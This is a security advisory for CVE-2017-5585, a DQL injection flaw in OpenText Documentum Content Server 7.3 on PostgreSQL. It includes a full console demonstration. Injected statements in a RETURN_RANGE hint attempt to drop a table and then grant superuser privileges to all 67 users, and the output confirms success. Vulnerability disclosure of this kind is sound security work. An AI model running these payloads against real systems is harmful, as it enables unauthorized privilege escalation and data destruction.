CVE-2017-5585: SQL injection in OpenText Documentum Content Server 7.3 (PostgreSQL builds only)

CVE Identifier: CVE-2017-5585
Vendor: OpenText
Affected products: OpenText  Documentum Content Server 7.3 (PostgreSQL builds only)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available

Description:

Previously announced fix for CVE-2014-2520 seems to be incomplete: when PostgreSQL Database is used and return_top_results_row_based config option is set to false, Content Server does not properly restrict DQL hints, which allows remote authenticated users to conduct DQL injection attacks and execute arbitrary DML/DDL statements on the target system via crafted request.

Demonstration:

==============================
==================================8<==============================================================
Connecting to Server using docbase DCTM_PSQL
[DM_SESSION_I_SESSION_START]info:  "Session 0102987880002902 started for user dm_bof_registry."


Connected to Documentum Server running Release 7.3.0000.0214  Linux64.Postgres
--
-- Amount of superusers in Documentum repository
--
1> select count(*) from dm_user where user_privileges=16
2> go
count
------------
           1
(1 row affected)


--
-- Demonstration or how Content Server translates DQL query to SQL
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
2> go
[DM_QUERY_E_CURSOR_ERROR]error:
   "A database error has occurred during the creation of a cursor
   (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it;
   Error while executing the query')."


1> exec get_last_sql
2> go
result
-------------------------------------------------------------------------------------------


select all CAST(count(*) as int) from dm_user_sp  dm_user order by 1;drop table dm_user_s; 1321 Commit 1321 Commit


(1 row affected)


--
-- Exploitation
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;')
2> go
count
------------
          67
(1 row affected)


--
-- Amount of superusers in Documentum repository after exploitation
--
1> select count(*) from dm_user where user_privileges=16
2> go
count
------------
          67
(1 row affected)
1>
================================================================>8==============================================================



Disclosure timeline:

2014.02.22: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure


__
Regards,
Andrey B. Panfilov